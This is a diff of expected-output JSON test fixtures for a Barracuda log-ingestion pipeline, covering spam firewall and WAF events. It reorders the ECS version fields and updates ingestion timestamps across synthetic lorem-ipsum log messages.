"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (dun.exe) queued as reprehe", "event": { - "ingested": "2021-06-09T09:46:40.867862100Z" + "ingested": "2021-12-14T14:35:57.048708405Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.90.9.88] global CHANGE umexerc (oremipsu)", "event": { - 
"ingested": "2021-06-09T09:46:40.867866400Z" + "ingested": "2021-12-14T14:35:57.048708794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (amco.exe) queued as ssecillu", "event": { - "ingested": "2021-06-09T09:46:40.867870600Z" + "ingested": "2021-12-14T14:35:57.048709185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (olo.exe) queued as psumqu", "event": { - "ingested": "2021-06-09T09:46:40.867903100Z" + "ingested": "2021-12-14T14:35:57.048709575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[rationev]: 10.226.20.199 tatem untutlab allow eveli 2 lillum 7809 1.2000 uisaute imide", "event": { - "ingested": "2021-06-09T09:46:40.867911200Z" + "ingested": "2021-12-14T14:35:57.048709962Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.134.140.191] global CHANGE nte (mvel)", "event": { - "ingested": "2021-06-09T09:46:40.867916600Z" + "ingested": "2021-12-14T14:35:57.048710366Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp[conse]: 10.252.40.172 nimadmin isiu licabo cancel etdolor 3 dic cola amcor", "event": { - "ingested": "2021-06-09T09:46:40.867921100Z" + "ingested": "2021-12-14T14:35:57.048710752Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[xea]: ites[10.126.26.131] nisiut 1536789735 1536789735 accept teturad perspici itation sequatD 5 24 isciv rroqu", "event": { - "ingested": "2021-06-09T09:46:40.867925200Z" + "ingested": "2021-12-14T14:35:57.048711143Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[rExc]: iusmo[10.187.210.173] reetd 1538024689 1538024689 accept ulpa sitam rad loi 2 15 Nequepor SZ:eirure SUBJ:deserun", "event": { - "ingested": "2021-06-09T09:46:40.867929200Z" + "ingested": "2021-12-14T14:35:57.048711531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (orroq.exe) queued as vitaedic", "event": { - "ingested": "2021-06-09T09:46:40.867933200Z" + "ingested": "2021-12-14T14:35:57.048711923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (orem.exe) queued as rcit", "event": { - "ingested": "2021-06-09T09:46:40.867937300Z" + "ingested": "2021-12-14T14:35:57.048712314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[untincul]: ssecil[10.180.147.129] atise 1541729552 1541729552 allow umetMalo oluptas emvele isnost 2 5 ido emqu", "event": { - "ingested": "2021-06-09T09:46:40.867995400Z" + "ingested": "2021-12-14T14:35:57.048712701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[exeaco]: 10.99.17.210 olorsit tore cancel illu 4 turadip 688 1.7484 boreetdo undeom", "event": { - "ingested": "2021-06-09T09:46:40.868003400Z" + "ingested": "2021-12-14T14:35:57.048713083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[uov]: 10.230.46.162 sBono loremqu accept quunt 3 siuta 1107 1.2607 dquia temporin", "event": { - "ingested": "2021-06-09T09:46:40.868008500Z" + "ingested": "2021-12-14T14:35:57.048713469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[nimveni]: idi[10.96.135.47] rum 1545434414 1545434414 accept eporroq ulla iqu oin 1 55 cingel modocon", "event": { - "ingested": "2021-06-09T09:46:40.868013300Z" + "ingested": "2021-12-14T14:35:57.048714047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (atv.exe) queued as onu", "event": { - "ingested": "2021-06-09T09:46:40.868017500Z" + "ingested": "2021-12-14T14:35:57.048714458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: obeataev[10.139.127.232] nsec 1547904323 1547904323 cancel maperi agnaaliq tlaboree norumet 7 48 tin SZ:fugitse SUBJ:imad", "event": { - "ingested": "2021-06-09T09:46:40.868021900Z" + "ingested": "2021-12-14T14:35:57.048714849Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: inv[10.163.209.70] atu 1549139277 1549139277 SCAN lloin remipsum tempor citatio 0 57 mveniamq SZ:taedict SUBJ:edquian", "event": { - "ingested": "2021-06-09T09:46:40.868025800Z" + "ingested": "2021-12-14T14:35:57.048715241Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (mipsamvo.exe) queued as eiusmod", "event": { - "ingested": "2021-06-09T09:46:40.868044Z" + "ingested": "2021-12-14T14:35:57.048715684Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[avolu]: Except[10.191.7.121] umetMal 1551609186 1551609186 accept sciun metcons itasper uae 2 21 uia iciad", "event": { - "ingested": "2021-06-09T09:46:40.868050500Z" + "ingested": "2021-12-14T14:35:57.048716072Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.157.196.101] gnaa 1552844140 1552844140 RECV mod doei cipitl", "event": { - "ingested": "2021-06-09T09:46:40.868055500Z" + "ingested": "2021-12-14T14:35:57.048716457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.171.72.5] global CHANGE eprehend (asnu)", "event": { - "ingested": "2021-06-09T09:46:40.868059700Z" + "ingested": "2021-12-14T14:35:57.048716844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: eritatis[10.209.184.60] mquisn 1555314049 1555314049 cancel uto emUte molestia quir 4 18 emip SZ:ver SUBJ:erc", "event": { - "ingested": "2021-06-09T09:46:40.868063300Z" + "ingested": "2021-12-14T14:35:57.048717234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[dolorsit]: archite[10.143.228.97] isqua 1556549003 1556549003 RECV uta emo itq", "event": { - "ingested": "2021-06-09T09:46:40.868067300Z" + "ingested": "2021-12-14T14:35:57.048717621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ntexpl.exe) queued as dunt", "event": { - "ingested": "2021-06-09T09:46:40.868071Z" + "ingested": "2021-12-14T14:35:57.048718007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: plic[10.17.87.79] tetur 1559018911 1559018911 block amali ate idolor ratvolu 7 64 onse olorem", "event": { - "ingested": "2021-06-09T09:46:40.868085300Z" + "ingested": "2021-12-14T14:35:57.048718411Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "web: [10.163.18.29] FAILED_LOGIN (nim)", "event": { - "ingested": "2021-06-09T09:46:40.868093900Z" + "ingested": "2021-12-14T14:35:57.048718793Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Retention violating accounts: erspi total", "event": { - "ingested": "2021-06-09T09:46:40.868099300Z" + "ingested": "2021-12-14T14:35:57.048719172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (billoi.exe) queued as moles", "event": { - "ingested": "2021-06-09T09:46:40.868105600Z" + "ingested": "2021-12-14T14:35:57.048719556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: taedi[10.17.98.243] etconsec 1563958728 1563958728 cancel ill mporinc onsectet idolo 8 55 docon SZ:mdolore SUBJ:eosquira", "event": { - "ingested": "2021-06-09T09:46:40.868109600Z" + "ingested": "2021-12-14T14:35:57.048719956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (apariatu.exe) queued as lorsita", "event": { - "ingested": "2021-06-09T09:46:40.868113600Z" + "ingested": "2021-12-14T14:35:57.048720334Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ever.exe) queued as tali", "event": { - "ingested": "2021-06-09T09:46:40.868117500Z" + "ingested": "2021-12-14T14:35:57.048720719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[mipsumqu]: tatio[10.181.247.224] onnu 1567663591 1567663591 RECV olorema aquiof ende", "event": { - "ingested": "2021-06-09T09:46:40.868121300Z" + 
"ingested": "2021-12-14T14:35:57.048721107Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[ugitse]: quiineav[10.235.116.121] ventore 1568898545 1568898545 deny obea emp agnaaliq est 0 73 aev SZ:inrepr SUBJ:mol", "event": { - "ingested": "2021-06-09T09:46:40.868125100Z" + "ingested": "2021-12-14T14:35:57.048721548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.178.30.158 llit tenimad sitametc allow onproide 2 cillumd riosa Ok: queued as tNe #to#10.1.6.115", "event": { - "ingested": "2021-06-09T09:46:40.868128600Z" + "ingested": "2021-12-14T14:35:57.048721926Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[rautod]: 10.124.32.120 lapar ritati accept qui 3 mullam 4965 1.4254 meaque uid", "event": { - "ingested": "2021-06-09T09:46:40.868132200Z" + "ingested": "2021-12-14T14:35:57.048722312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ataevita.exe) queued as oremqu", "event": { - "ingested": "2021-06-09T09:46:40.868135700Z" + "ingested": "2021-12-14T14:35:57.048722699Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (velitsed.exe) queued as magnaali", "event": { - "ingested": "2021-06-09T09:46:40.868139300Z" + "ingested": "2021-12-14T14:35:57.048723082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: der[10.77.182.191] enbyCi 1575073317 1575073317 SCAN quameiu diduntu eiusmod itation 8 79 piciatis2460.api.host iusmodt", "event": { - "ingested": 
"2021-06-09T09:46:40.868142800Z" + "ingested": "2021-12-14T14:35:57.048723467Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: iame[10.193.110.71] tiumd 1576308271 1576308271 accept loinve tanimid isnostru nofdeFi 3 5 saqu remips", "event": { - "ingested": "2021-06-09T09:46:40.868149Z" + "ingested": "2021-12-14T14:35:57.048724263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index a360b6c9309..aaf021290fc 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.484974100Z" + "ingested": "2021-12-14T14:35:58.799877518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (nbyCic).", "event": { - "ingested": "2021-06-09T09:46:41.484991300Z" + "ingested": "2021-12-14T14:35:58.799880166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:tvolup] New attack definition version 1.1000 is available", "event": { - "ingested": "2021-06-09T09:46:41.484997500Z" + "ingested": "2021-12-14T14:35:58.799880578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. 
Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485001900Z" + "ingested": "2021-12-14T14:35:58.799880963Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Initializing STM.", "event": { - "ingested": "2021-06-09T09:46:41.485005900Z" + "ingested": "2021-12-14T14:35:58.799881322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #imadm, address=10.16.222.151", "event": { - "ingested": "2021-06-09T09:46:41.485009700Z" + "ingested": "2021-12-14T14:35:58.799881696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:eritqui] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485013300Z" + "ingested": "2021-12-14T14:35:58.799882051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode change: ccusant,epteurs", "event": { - "ingested": "2021-06-09T09:46:41.485016800Z" + "ingested": "2021-12-14T14:35:58.799882426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:modoco] New attack definition version 1.3971 is available", "event": { - "ingested": "2021-06-09T09:46:41.485020600Z" + "ingested": "2021-12-14T14:35:58.799882792Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-doloreeu elillumq CreateServer =loremeum", "event": { - "ingested": "2021-06-09T09:46:41.485024200Z" + "ingested": "2021-12-14T14:35:58.799883167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - 
"ecs": { - "version": "1.12.0" - }, "message": "STM: WebLog-radi ula itsed: SapCtx=rad,SapId=olupta, ididu", "event": { - "ingested": "2021-06-09T09:46:41.485027800Z" + "ingested": "2021-12-14T14:35:58.799883547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:xcepte] New attack definition version 1.4012 is available", "event": { - "ingested": "2021-06-09T09:46:41.485031400Z" + "ingested": "2021-12-14T14:35:58.799884108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: lo4933", "event": { - "ingested": "2021-06-09T09:46:41.485035100Z" + "ingested": "2021-12-14T14:35:58.799884474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:doconse] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485038700Z" + "ingested": "2021-12-14T14:35:58.799884820Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: odite atn It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., sectet", "event": { - "ingested": "2021-06-09T09:46:41.485042400Z" + "ingested": "2021-12-14T14:35:58.799885168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-tet voluptas ActiveServerOutOfBandMonitorAttr =inv", "event": { - "ingested": "2021-06-09T09:46:41.485046Z" + "ingested": "2021-12-14T14:35:58.799885518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: [ALERT:obeata] Configuration size is pexeaco which exceeds the ercitati safe 
limit. Please check your configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485049700Z" + "ingested": "2021-12-14T14:35:58.799885995Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode change: urEx,labo", "event": { - "ingested": "2021-06-09T09:46:41.485053700Z" + "ingested": "2021-12-14T14:35:58.799886363Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485057500Z" + "ingested": "2021-12-14T14:35:58.799886720Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-Maloru lapariat SetServerdmin=oinBCSed", "event": { - "ingested": "2021-06-09T09:46:41.485061200Z" + "ingested": "2021-12-14T14:35:58.799887082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "event": { - "ingested": "2021-06-09T09:46:41.485064900Z" + "ingested": "2021-12-14T14:35:58.799887433Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: luptate Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485068400Z" + "ingested": "2021-12-14T14:35:58.799887806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-isistena Malorum SetSapquelauda=enderit", "event": { - "ingested": "2021-06-09T09:46:41.485072100Z" + "ingested": "2021-12-14T14:35:58.799888155Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "eventmgr: Forwarding log messages to syslog host #equun, address=10.4.65.246", "event": { - "ingested": "2021-06-09T09:46:41.485075800Z" + "ingested": "2021-12-14T14:35:58.799888613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:exer] New attack definition version 1.481 is available", "event": { - "ingested": "2021-06-09T09:46:41.485079400Z" + "ingested": "2021-12-14T14:35:58.799888967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485083400Z" + "ingested": "2021-12-14T14:35:58.799889323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485087800Z" + "ingested": "2021-12-14T14:35:58.799890264Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: isnisiu aspernat Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485092500Z" + "ingested": "2021-12-14T14:35:58.799890711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for mquel release.", "event": { - "ingested": "2021-06-09T09:46:41.485096300Z" + "ingested": "2021-12-14T14:35:58.799891077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from ueporr to ptate", "event": { - "ingested": "2021-06-09T09:46:41.485100200Z" + "ingested": "2021-12-14T14:35:58.799891456Z" + }, 
+ "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:onsequ] enp0s7094: link is up", "event": { - "ingested": "2021-06-09T09:46:41.485103700Z" + "ingested": "2021-12-14T14:35:58.799891817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: iquip tDuisau It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., amali", "event": { - "ingested": "2021-06-09T09:46:41.485107300Z" + "ingested": "2021-12-14T14:35:58.799892174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485111200Z" + "ingested": "2021-12-14T14:35:58.799892530Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485114800Z" + "ingested": "2021-12-14T14:35:58.799892892Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-mveniam rvelill EnableServer =iame", "event": { - "ingested": "2021-06-09T09:46:41.485118500Z" + "ingested": "2021-12-14T14:35:58.799893373Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads iseuf", "event": { - "ingested": "2021-06-09T09:46:41.485122400Z" + "ingested": "2021-12-14T14:35:58.799893731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: WebLog-ipiscin idolore turExce: SapCtx=modoc,SapId=mdolors, borios", "event": { - 
"ingested": "2021-06-09T09:46:41.485126100Z" + "ingested": "2021-12-14T14:35:58.799894091Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "event": { - "ingested": "2021-06-09T09:46:41.485129900Z" + "ingested": "2021-12-14T14:35:58.799894448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #ccusa, address=10.58.33.30", "event": { - "ingested": "2021-06-09T09:46:41.485133700Z" + "ingested": "2021-12-14T14:35:58.799894796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:uiadolo] eth321: link is up", "event": { - "ingested": "2021-06-09T09:46:41.485137500Z" + "ingested": "2021-12-14T14:35:58.799895154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: rsi ciduntut Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485141100Z" + "ingested": "2021-12-14T14:35:58.799895507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: radipis RPC Name =isa, RPC Result: aal", "event": { - "ingested": "2021-06-09T09:46:41.485145300Z" + "ingested": "2021-12-14T14:35:58.799895862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for ris release.", "event": { - "ingested": "2021-06-09T09:46:41.485149100Z" + "ingested": "2021-12-14T14:35:58.799896222Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"CONFIG_AGENT: aliqui rcitat Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485152600Z" + "ingested": "2021-12-14T14:35:58.799896570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: aeconse Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485159200Z" + "ingested": "2021-12-14T14:35:58.799896943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485163900Z" + "ingested": "2021-12-14T14:35:58.799897305Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: iaecon ipexea Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485167700Z" + "ingested": "2021-12-14T14:35:58.799897655Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from nulapa to cillu", "event": { - "ingested": "2021-06-09T09:46:41.485171300Z" + "ingested": "2021-12-14T14:35:58.799898010Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:ectetura] Firmware storage exceeds didun", "event": { - "ingested": "2021-06-09T09:46:41.485174800Z" + "ingested": "2021-12-14T14:35:58.799898374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: rcit nul Received put-tree command", "event": { - "ingested": "2021-06-09T09:46:41.485178300Z" + "ingested": "2021-12-14T14:35:58.799898734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
